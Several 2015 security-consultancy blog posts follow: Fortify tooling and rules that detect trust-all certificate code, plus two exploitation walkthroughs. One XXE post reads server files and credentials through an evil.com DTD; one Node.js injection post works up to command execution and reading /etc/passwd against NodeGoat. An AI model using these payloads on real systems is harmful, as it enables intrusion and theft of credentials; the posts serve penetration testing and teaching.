Twitter
Saturday
Jun132015

Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in our previous posting, GDS often assists organizations by developing custom security checks for security issues or insecure patterns identified after manual security code review. However there are languages that Fortify does not directly support, making it difficult to integrate code written in unsupported languages into an organization’s existing analysis framework.

Scala is an example of a language that is not supported by Fortify and therefore other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to perform static analysis of Scala application bytecode. How can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server to manage the identified vulnerabilities? We have written a lightweight Java tool that can be used to convert a Findbugs XML report into a Fortify FPR file. This will allow the Findbugs results to be submitted to the SSC server as if scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure, as shown below:

Screen Shot 2015-05-29 at 10.55.05.png

The result of the SCA analysis is stored in the audit.fvdl file in an XML format. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file that contains the finding descriptions and recommendations, using both the Findbugs bundled findings and the GDS-developed Scala ones. It is also possible to use a custom messages.xml as input. This is particularly useful for adding new write-ups for your own custom rules for Findbugs.

The merged file is then transformed to the FVDL data structure through an XSL Transformation.

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.

In doing so, the transformation is completely decoupled from the code, and it is only dependent on the used XSLT stylesheet, which can be modified without recompiling the tool.

The application is packaged in a single runnable jar and can be used as follows:

$ java -­jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -­jar convert2FPR.jar findbugs messages.xml report.xml

The output file, in both cases is ./report.fpr .

The first parameter (findbugs) represents the input format and maps to the corresponding XSL (see below Java example):

static{
formats.put("findbugs","com/gds/convert2fpr/findbugs/fvdl.xsl");

}

In order to extend the tool to support further input formats, only a new XSL file and one additional line in the above code for each added XSL stylesheet are required.

The source code and compiled tool can be found on our Github Repository below:
https://github.com/GDSSecurity/Convert2FPR/

Monday
Jun082015

Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns that we find during our source code security reviews. These patterns can represent both common security flaws or unique security weaknesses specific to either the application being assessed, its architecture/design, utilised components, or even the development team itself. These custom rules are often developed to target specific languages and be implemented within a specific static analysis tool depending on what our client is using already or most comfortable with - previous examples include FindBugs, PMD, Visual Studio and of course Fortify SCA.  

In this blog post I will be focusing on developing PoC rules for Fortify SCA to target Java based applications, however, the same concepts can easily be extended to other tools and/or development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al, who demonstrate a wide range of serious security flaws are the result of an incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify an insecure use of the SSL/TLS APIs in Java, which could result in Man-in-the-Middle or spoofing attacks allowing a malicious host to impersonate a trusted one. The integration of HP Fortify SCA in the SDLC allows applications to be efficiently scanned for vulnerabilities on a regular basis. We found out that issues occurring due to SSL APIs misuse are not identified with the out of the box rule-sets, thus we developed a comprehensive 12 custom-rule pack for Fortify.

Secure Sockets Layer (SSL/TLS) is the most widely used protocol for secure communication over the web using cryptographic processes to provide authentication, confidentiality, and integrity. To ensure the identity of the party, X.509 certificates must be exchanged and verified. Once the parties are authenticated, the protocol provides an encrypted connection. The algorithms used for encryption in SSL include a secure hash function, which guarantees the integrity of the data.

When using SSL/TLS, the following two steps must be performed in order to ensure no man in the middle tampers with the channel:

  • Certificate Chain-Of-Trust verification: a X.509 certificate specifies the name of the certificate authority (CA) that issued the certificate. The server also sends to the client a list of certificates of the intermediate CA all the way to a root CA. The client verifies the signature, expiration (and other checks out of the scope of this post such as revocation, basic constraints, policy constraints, etc) of each certificate starting from the server’s certificate at the bottom going up to the root CA. If the algorithm reaches the last certificate in the chain, with no violations, then verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC2818 prescribes to use SubjectAltNames and Common Name for backwards compatibility.

The following mis-use cases can occur when SSL/TLS APIs are not used securely and can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager so that its logic will trust every presented server certificates without performing the Chain-Of-Trust verification.

TrustManager[] trustAllCerts = new TrustManager[] {
        new X509TrustManager() {
...
   	public void checkServerTrusted(X509Certificate[] certs, 
                 String authType){}
}

This case usually originates from development environments where self-signed Certificates are widely used. In our experiences, we commonly find developers disabling certificate validation altogether instead of loading the certificate into their keystore.This leads to this dangerous coding pattern accidentally making its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) will still be there, providing a false sense of safety as it will not detect the smoke (un-trusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. Also on StackOverflow, a number of questions ask how to ignore certificate errors, obtaining replies similar to the above vulnerable code. It’s concerning that the most voted answers suggest to disable any trust management.

Allowing All Hostnames

The application does not check whether the digital certificate that the server sends is issued to the URL the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default, again this can be disabled by overriding the verify() method in the corresponding HostnameVerifier class (there are around 12,800 results when searching for the below code on GitHub).

HostnameVerifier allHostsValid = new HostnameVerifier() {
public boolean verify(String hostname, SSLSession session) {
          	return true;
   	}
};

The SSLSocket API does not perform hostname verification out of the box. The below code is a Java 8 snippet, hostname verification is performed only if the endpoint identification algorithm is different from an empty String or a NULL value.

private void checkTrusted(X509Certificate[] chain, String authType, SSLEngine engine, boolean isClient) 
throws CertificateException{
  ...
  String identityAlg = engine.getSSLParameters().
            getEndpointIdentificationAlgorithm();
  if (identityAlg != null && identityAlg.length() != 0) {
            checkIdentity(session, chain[0], identityAlg, isClient,
                    getRequestedServerNames(engine));
  }
  ...
}

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to NULL, thus the hostname verification is silently skipped. Thus, if the attacker has a MITM position on the network when a client connects to ‘domain.com’, the application will also accept a valid server certificate issued for ‘some-evil-domain.com’.

This documented behavior is buried in the JSSE reference’s guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”

Our contribution: Fortify SCA Rules

To detect the above insecure usage we have coded the following checks in 12 custom rules for HP Fortify SCA. These rules identify issues in code relying on both JSSE and Apache HTTPClient since they are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule is fired when the code declares a HostnameVerifier, and it always returns ‘true’.

<Predicate>
  <![CDATA[
Function f: f.name is "verify" and f.enclosingClass.supers 
contains [Class: name=="javax.net.ssl.HostnameVerifier" ] and 
f.parameters[0].type.name is "java.lang.String" and 
f.parameters[1].type.name is "javax.net.ssl.SSLSession" and 
f.returnType.name is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 
  ]]>
</Predicate>
  • Over-Permissive Trust Manager: the rule is fired when the code declares a TrustManager and if it never throws a CertificateException. Throwing the exception is the way the API manages unexpected conditions.

<Predicate>
  <![CDATA[
Function f: f.name is "checkServerTrusted" and 
f.parameters[0].type.name is "java.security.cert.X509Certificate" 
and f.parameters[1].type.name is "java.lang.String" and 
f.returnType.name is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 
"(javax.security.cert.CertificateException|java.security.cert.CertificateException)"]] 
  ]]>
</Predicate>
  • Missing Hostname Verification: the rule is fired when the code is using the Low-Level SSLSocket API and does not set a HostnameVerifier.

  • Often Misused: Custom HostnameVerifier: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom SSLSocketFactory.

We decided to fire the “often misused” rules since the application is using the High-Level API and the overriding of these methods should be manually reviewed.

The rules pack is available on Github. These checks should always be performed during Source Code Analysis to ensure the code is not introducing an insecure SSL/TLS usage.

https://github.com/GDSSecurity/JSSE_Fortify_SCA_Rules
Sunday
May312015

CA Privilege Identity Manager Security Research Whitepaper

Today we are announcing the release of our latest whitepaper that includes the results of a research project performed for CA Technologies earlier this year. The focus of the research was to determine the effectiveness of the security controls provided by the CA Privilege Identity Manager (CA PIM) solution against attacks that target privileged identities.  Privilege Identity Management is an approach for reducing risk and securing super user accounts. These accounts are required in every IT organization for performing system administrator tasks and the CA PIM solution aims to provide access and account management through a variety of security controls.

The CA PIM components that were considered in scope for the research project were the following:

  • Fine-Grained Access Controls – Layers access controls on top of the native operating system for protecting privileged accounts. In the event a privileged account is compromised, access to the compromised system is restricted.

  • Granular Audit Logging – Provides audit logging or tracking identity and actions of privileged accounts even in shared account scenarios. Combined with enforced fine-grained access controls, this is intended to help with early detection of privileged account compromise.

  • Application Jailing – Provides the ability to enforce fine-grained access controls on applications and processes. By limiting the system resources that can be accessed by an application, those resources are inaccessible to an attacker in the event a vulnerability is exploited, including previously unknown 0-day vulnerabilities.

The research performed included the following major activities:

  • Learning PIM and Initial Setup - The GDS Labs research team started with zero knowledge of the platform and learned about its features and capabilities through setting up common deployment scenarios, reviewing administrator guides, and receiving guidance from CA PIM product support. Additionally, profiling of the relevant agent processes was performed to identify system resources accessed, network communications, etc.

  • Threat and Countermeasure Enumeration - Research activities investigated how CA PIM can be deployed to mitigate common security threat vectors and attacks that target privileged users. The threats and attacks were narrowed to those relevant to the in-scope CA PIM components. Various CA PIM access control policies and configuration settings were identified as potential countermeasures.

  • Solution Mitigation Verification - Selected validation testing was performed to determine the resiliency of configured CA PIM policies against common bypass techniques and exploits relevant to fine-grained access controls. Additionally, CA PIM’s intercepting kernel agent architecture as well as sudo, shell wrapper, and proxy control architectures were compared and evaluated to determine their resiliency to the threats and attacks.

A penetration testing assessment of the product was not performed as part of this phase of the research project. Recommendations for improving the security posture of the product were provided to CA where relevant.

The whitepaper containing the results from our research can be downloaded from our Github page:

https://github.com/GDSSecurity/Whitepapers/raw/master/GDS%20Labs%20-%20CA%20Technologies%20CA%20PIM%20Security%20Research%20White%20Paper.pdf

 

Wednesday
Apr292015

Automated Data Exfiltration with XXE

During a recent penetration test GDS assessed an interesting RESTful web service that lead to the development of a tool for automating the process of exploiting an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we will have a look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.

The example request below shows four parameters in the body of the HTTP request:

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 109

 

<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<firstname>John</firstname>
<surname>Doe</surname>
<email>[email protected]</email>

<role>admin</role>

The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 10:57:28 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

 

{
    “userId”: 123,
    “firstname”: “John”,
    “surname”: “Doe”,
    “email”: “[email protected]”,
    “role”: “admin”

}

Note that the web service accepts JSON and XML input, which explains why the response is JSON encoded. Supporting multiple data formats is becoming more common and has been detailed by a recent blog post by Antti Rantasaari.

A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 233

 

<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM “file:///etc/tomcat7/”>
]>
<user>
    <firstname>John</firstname>
    <surname>&xxe;</surname>
    <email>[email protected]</email>
    <role>admin</role>

</user>

By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:

 

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:04:01 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

 

{
    “userId”: 126,
    “firstname”: “John”,
    “surname”: “Catalina\ncatalina.properties\ncontext.xml\nlogging.properties\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n”,
    “email”: “[email protected]”,
    “role”: “admin”

}

The Tool

Now that we can get directory listings and retrieve files the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat”:

# python xxeclient.py /etc/tomcat7/
2015-04-24 16:21:10,650 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,668 [INFO    ] retrieving /etc/tomcat7/Catalina/
2015-04-24 16:21:10,690 [INFO    ] retrieving /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,696 [INFO    ] looks like a file: /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,699 [INFO    ] saving etc/tomcat7/Catalina/localhost
2015-04-24 16:21:10,700 [INFO    ] retrieving /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,711 [INFO    ] looks like a file: /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,714 [INFO    ] saving etc/tomcat7/catalina.properties
2015-04-24 16:21:10,715 [INFO    ] retrieving /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] looks like a file: /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] saving etc/tomcat7/context.xml

[…]

Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:

<?xml version=”1.0” encoding=”UTF-8”?>
<Context>
    <Resource name=”jdbc/myDB”
             auth=”Container”
             type=”javax.sql.DataSource”
             username=”sqluser”
             password=”password”
             driverClassName=”com.mysql.jdbc.Driver”
             url=”jdbc:mysql://…”/>

</Context>

How it works

The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag. As a result invalid XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover the application might ignore unexpected XML tags.

To overcome these limitations the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). With the following request, five entities are declared. The file content is loaded into “%file”, “%start” starts a CDATA section and “%end” closes it. Finally, “%dtd” loads a specially crafted dtd file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. This entity is then referenced in the “<surname>” tag.

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 378

 

<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<!DOCTYPE updateProfile [
  <!ENTITY % file SYSTEM “file:///etc/tomcat7/context.xml”>
  <!ENTITY % start “<![CDATA[“>
  <!ENTITY % end “]]>”>
  <!ENTITY % dtd SYSTEM “http://evil.com/evil.dtd”>
%dtd;
]>
<user>
    <firstname>John</firstname>
    <surname>&xxe;</surname>
    <email>[email protected]</email>
    <role>admin</role>

</user>

This is the resource “evil.dtd” that is loaded from web server we control:

<!ENTITY xxe “%start;%file;%end;”>

The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:12:43 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

 

{
    “userId”: 127,
    “firstname”: “John”,
    “surname”: “<?xml version=”1.0” encoding=”UTF-8”?>\n<Context>\n<Resource name=”jdbc/myDB” auth=”Container” type=”javax.sql.DataSource” username=”sqluser” password=”password” driverClassName=”com.mysql.jdbc.Driver” url=”jdbc:mysql://…”/>\n</Context>”,
    “email”: “[email protected]”,
    “role”: “admin”

}

Caveats

Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) signs or non-Unicode characters (e.g. bytes < 0x20) still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section.

In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that files only contain alphanumerics, space and the following characters: “$.-_~”. Alternatively, we could also treat every file as a directory, iterate over its lines and try to download these possible files or subdirectories. However, this would result in too much overhead when encountering large files.

The script is tailored for the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it for another target.

The script is available on GitHub: https://github.com/GDSSecurity/xxe-recursive-download

Summary

One way to exploit XXE is to download files from the target server. Some parsers also return a directory listing. In this case we can use the presented script to recursively download whole directories. However, there are restrictions on the file content because certain characters can break the XML syntax.

Wednesday
Apr152015

Node.js Server-Side JavaScript Injection Detection & Exploitation

Late last year, Burp scanner started testing for Server-Side JavaScript (SSJS) code injection. As you’d expect, this is where an attacker injects JavaScript into a server side parser and results in arbitrary code execution.

scan.png

Burp Scanner Detecting SSJS Code Injection

 

Burp uses arguably the best method there is for detecting SSJS code injection: time delays. This is more powerful than other methods (such as echoing content into the response) as it can detect evaluation in fully blind scenarios. Another reason for favouring time delay based detection is that there are a wealth of distinct server-side JavaScript solutions and the generic nature of time delay payloads means that they may be more likely to work across a range of diverse platforms. Conversely, exploitation payloads are more platform specific as typically they tie into API calls for file system access and command execution.

 

This time based detection approach is, however, subject to false positives, so we need to be able to take a ‘lead’ like a time delay, and verify its veracity by exploiting the vulnerability. For that, we need to develop manual detection and exploitation Server-Side JavaScript payloads.

 

In this blog post I’ll discuss some example manual detection techniques taken from an article by Felipe Aragon from 2012, and exploitation techniques taken from a paper by Bryan Sullivan from 2011. Finally, I’ll build upon what we’ve learned to finish with a couple of hacked-together, but functional, Server Side JavaScript command ‘shells’.

 

Note that this blog post focuses upon Node.js; if you find you can demonstrate JavaScript evaluation through time delays, but none of the exploitation techniques shown work, you may be looking at a different SSJS solution.

 

Combining User Input With Dangerous Functions

For demonstration purposes, we’ll use the highly recommended NodeGoat purposely vulnerable Node.js web application. The NodeGoat Contributions page is vulnerable to SSJS injection; this code snippet shows why:

 

eval.png

The cause of the problem: NodeGoat’s contributions.js uses eval() to parse input  

 

The above code snippet taken from app/routes/contributions.js page shows the eval() function is used to parse user input - this is the root cause of the problem. Helpfully, an example solution is also provided in the NodeGoat source code: process user input using an alternative parser - in this case parseInt.

 

Manual Server Side JavaScript Injection Detection

So. Lets imagine we are on an engagement and have identified a potentially vulnerable SSJS injection vector. What now? Lets simplify and repeat Burp’s time delay test manually in order to verify the results and understand what’s going on. Below is a request that will cause a 10 second time delay if the application is vulnerable:

 

Note: Newlines were added to attack strings within HTTP Requests for readability
POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
 
preTax=1;
var cd;
var d=new Date();
do{
cd=new Date();
}while(cd-d<10000)

 

The above payload (taken from an article by Felipe Aragon) declares two variables: cd and d, and stores the current time in d. Then a while loop is entered into that repeatedly obtains the current time until the stored time is ten seconds less than the current time.

If executed, the payload will result in a delay of at least 10 seconds (plus the usual request round trip time). In SQL injection terms, this is more of a waitfor delay() than a benchmark(), in that the time delay is of fixed, attacker-definable duration.

 

Useful Error Messages and Enumeration of the Response Object Name

Before we move onto exploitation, lets attempt to write output into a response. While this is not a requirement for exploitation, command execution vulnerabilities are much easier to exploit when they are non-blind. Extrapolating from the paper by Bryan Sullivan we can use response.end() to write arbitrary content into the response:

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
preTax=1;response.end('testvalue9000')

This fails, returning a 500 error and the following message:

ReferenceError: response is not defined

This is both good and bad. ReferenceError is a great indicator that we are injecting into a Server Side JavaScript parser, but the error indicates that response.end is not the correct response object name. NodeGoat uses the express() API, which follows the convention of referring to the response object as res as opposed to response. However, the Express API documentation goes on to make the point that this convention does not have to be followed, so keep in mind that the response object could be called anything. Lets try calling res.end():

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
 
preTax=1;res.end('testvalue9000')
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:33:56 GMT
Connection: keep-alive
Content-Length: 13
 
testvalue9000
 

Exploiting Server Side JavaScript Injection

Once we have enumerated the response object name and can write content into responses, we can read from, and write to, the file system using the techniques shown in Bryan Sullivan’s paper.

 

For example, lets grab a directory listing of /etc/:

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
 
preTax=1;res.end(require('fs').readdirSync('/etc').toString())
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:37:12 GMT
Connection: keep-alive
Content-Length: 1439
 
.pwd.lock,X11,adduser.conf,alternatives,
apparmor,apparmor.d,apt,bash.bashrc,
bash_completion.d,bindresvport.blacklist,
blkid.conf,blkid.tab,ca-certificates,
ca-certificates.conf,console-setup,cron.d,
cron.daily,cron.hourly,cron.m
[... and so on ...]
 

As described in Bryan’s paper, we can ‘require’ new API modules as… well, required. As soon as I saw this I started looking for command execution API calls; sure enough, child_process allows us to make calls to the OS. For example, to blindly execute a command:

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
 
preTax=1;
var exec = require('child_process').exec; 
var out = exec('touch /tmp/q234f');
 
bitnami@linux:/tmp$ ls
q234f
 

SSJS Command Execution With Stdout

Blind command execution is all well and good, but there’s nothing quite like the immediacy and convenience of command execution with stdout in the response. The below (dirty hack) pretty much achieves this.

 

The first time the request is submitted, the shell command is executed, and the output is written to a file. You also may see see an “Error: ENOENT, no such file or directory ‘/tmp/sddfr.txt’” message. The reason for this is the asynchronous nature of Node.js; this, the problems it causes for Node.js command shells, and the solution is very well explained in this blog post by Bert Belder.

 

The second time the command is submitted, the shell output is read back from the file and written to the response. Of course, the location of the file may cause problems - an alternative approach would be to keep the file within the Node.js application directory (e.g. replace /tmp/sddfr.txt with sddfr.txt in the example below.)

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
 
preTax=1;
var fs = require('fs');
var cat = require('child_process').spawn('uname', ['-a']);
cat.stdout.on('data', function(data) { 
fs.writeFile('/tmp/sddfr.txt', data)}); 
var out = fs.readFileSync('/tmp/sddfr.txt'); 
res.write(out); res.end()
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:54:56 GMT
Connection: keep-alive
Content-Length: 104
 
Linux linux 3.13.0-36-generic #63-Ubuntu SMP Wed Sep 3 21:30:07 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Our dirty hack is all very well, but the aforementioned blog post by Bert Belder heralds the arrival  of execSync “a Synchronous API for Child Processes” in Node.js v0.12. This sounds much more elegant - lets give it a try:

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
 
preTax=2;
var asd = require('child_process').execSync('cat /etc/passwd');
res.write(asd)

Nope. This fails, returning a 500 error and the following message:

TypeError: Object #<Object> has no method 'execSync'

Wait - what version of Node.js is this?

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 238
 
preTax=2;
var fs = require('fs');
var cat = require('child_process').spawn('node', ['-v']);
cat.stdout.on('data', function(data) { 
fs.writeFile('/tmp/sddfr.txt', data)}); 
var out = fs.readFileSync('/tmp/sddfr.txt'); 
res.write(out); res.end()
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Sun, 22 Feb 2015 08:51:50 GMT
Connection: keep-alive
Content-Length: 9
 
v0.10.35
 

Node.js v.0.10 doesn’t support execSync - good thing we have our dirty hack. We build a new server with Node.js v0.12.0, and try again:

POST /contributions HTTP/1.1
Host: 192.168.2.133:5000
Cookie: connect.sid=..snip..
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
 
preTax=2;
var asd = require('child_process').execSync('cat /etc/passwd');
res.write(asd)
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Tue, 24 Feb 2015 20:40:07 GMT
Connection: keep-alive
Content-Length: 1966
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[... and so on ...]
 

Wrap Up

So there it is. I’ve shown how to advance from automated time based detection of SSJS injection  (e.g. a Burp scan) to manual verification via time delays, writing to responses, accessing the server file system and ultimately executing commands. Along the way, I’ve shown two potential barriers (the need to enumerate the correct response object name and the changing nature of the Node.js API) and offered suggestions for overcoming them.